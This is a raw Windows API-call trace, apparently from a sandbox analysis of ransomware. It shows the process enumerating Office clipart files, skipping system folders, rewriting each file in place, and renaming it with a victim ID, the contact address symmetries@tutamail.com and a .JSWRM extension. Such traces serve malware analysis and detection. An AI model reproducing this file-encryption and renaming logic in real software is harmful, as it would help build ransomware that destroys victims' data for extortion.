lstrcmpiW (lpString1="J0105912.WMF", lpString2=".") returned 1 [0081.577] lstrcmpiW (lpString1="J0105912.WMF", lpString2="..") returned 1 [0081.577] lstrcmpiW (lpString1="J0105912.WMF", lpString2="...") returned 1 [0081.577] lstrcmpiW (lpString1="J0105912.WMF", lpString2="windows") returned -1 [0081.577] lstrcmpiW (lpString1="J0105912.WMF", lpString2="recovery") returned -1 [0081.577] lstrcmpiW (lpString1="J0105912.WMF", lpString2="perflogs") returned -1 [0081.577] lstrcmpiW (lpString1="J0105912.WMF", lpString2="documents and settings") returned 1 [0081.577] lstrcmpiW (lpString1="J0105912.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.577] lstrcmpiW (lpString1="J0105912.WMF", lpString2="system volume information") returned -1 [0081.577] lstrcmpiW (lpString1="J0105912.WMF", lpString2="msocache") returned -1 [0081.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0081.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105912.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105912.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105912.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0081.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0081.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105912.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105912.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105912.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0081.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0081.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0081.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0081.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.578] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11720) returned 1 [0081.578] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2dc0) returned 0x24d210 [0081.578] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2dc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2dc0, lpOverlapped=0x0) returned 1 [0081.629] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.629] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2dc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2dc0, lpOverlapped=0x0) returned 1 [0081.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.629] CloseHandle (hObject=0x314) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0081.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0081.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0081.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0081.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0081.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.630] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0081.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0081.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0081.631] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1204, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105974.WMF", cAlternateFileName="")) returned 1 [0081.631] lstrcmpiW (lpString1="J0105974.WMF", lpString2=".") returned 1 [0081.631] lstrcmpiW (lpString1="J0105974.WMF", lpString2="..") returned 1 [0081.631] lstrcmpiW (lpString1="J0105974.WMF", lpString2="...") returned 1 [0081.631] lstrcmpiW (lpString1="J0105974.WMF", lpString2="windows") returned -1 [0081.631] lstrcmpiW (lpString1="J0105974.WMF", lpString2="recovery") returned -1 [0081.632] lstrcmpiW (lpString1="J0105974.WMF", lpString2="perflogs") returned -1 [0081.632] lstrcmpiW (lpString1="J0105974.WMF", lpString2="documents and settings") returned 1 [0081.632] lstrcmpiW (lpString1="J0105974.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.632] lstrcmpiW (lpString1="J0105974.WMF", lpString2="system volume information") returned -1 [0081.632] lstrcmpiW (lpString1="J0105974.WMF", lpString2="msocache") returned -1 [0081.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105974.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105974.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105974.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0081.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105974.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105974.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105974.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0081.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0081.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105974.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.633] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4612) returned 1 [0081.633] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1200) returned 0x205850 [0081.633] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1200, lpOverlapped=0x0) returned 1 [0081.635] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.635] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1200, lpOverlapped=0x0) returned 1 [0081.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.635] CloseHandle (hObject=0x314) returned 1 [0081.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0081.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0081.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0081.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0081.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0081.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0081.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.635] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105974.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105974.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0081.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0081.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.636] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x274c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0106020.WMF", cAlternateFileName="")) returned 1 [0081.636] lstrcmpiW (lpString1="J0106020.WMF", lpString2=".") returned 1 [0081.636] lstrcmpiW (lpString1="J0106020.WMF", lpString2="..") returned 1 [0081.636] lstrcmpiW (lpString1="J0106020.WMF", lpString2="...") returned 1 [0081.636] lstrcmpiW (lpString1="J0106020.WMF", lpString2="windows") returned -1 [0081.636] lstrcmpiW (lpString1="J0106020.WMF", lpString2="recovery") returned -1 [0081.636] lstrcmpiW (lpString1="J0106020.WMF", lpString2="perflogs") returned -1 [0081.636] lstrcmpiW (lpString1="J0106020.WMF", lpString2="documents and settings") returned 1 [0081.637] lstrcmpiW (lpString1="J0106020.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.637] lstrcmpiW (lpString1="J0106020.WMF", lpString2="system volume information") returned -1 [0081.637] lstrcmpiW (lpString1="J0106020.WMF", lpString2="msocache") returned -1 [0081.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0081.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106020.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106020.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106020.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0081.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0081.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106020.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106020.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106020.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0081.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0081.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106020.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.637] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10060) returned 1 [0081.637] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2740) returned 0x24d210 [0081.637] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2740, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2740, lpOverlapped=0x0) returned 1 [0081.640] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.640] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2740, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2740, lpOverlapped=0x0) returned 1 [0081.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.640] CloseHandle (hObject=0x314) returned 1 [0081.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0081.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0081.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0081.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0081.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0081.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0081.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.640] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106020.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106020.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0081.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0081.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.641] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0106124.WMF", cAlternateFileName="")) returned 1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2=".") returned 1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2="..") returned 1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2="...") returned 1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2="windows") returned -1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2="recovery") returned -1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2="perflogs") returned -1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2="documents and settings") returned 1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2="system volume information") returned -1 [0081.641] lstrcmpiW (lpString1="J0106124.WMF", lpString2="msocache") returned -1 [0081.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0081.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106124.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106124.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106124.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0081.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0081.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106124.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106124.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106124.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 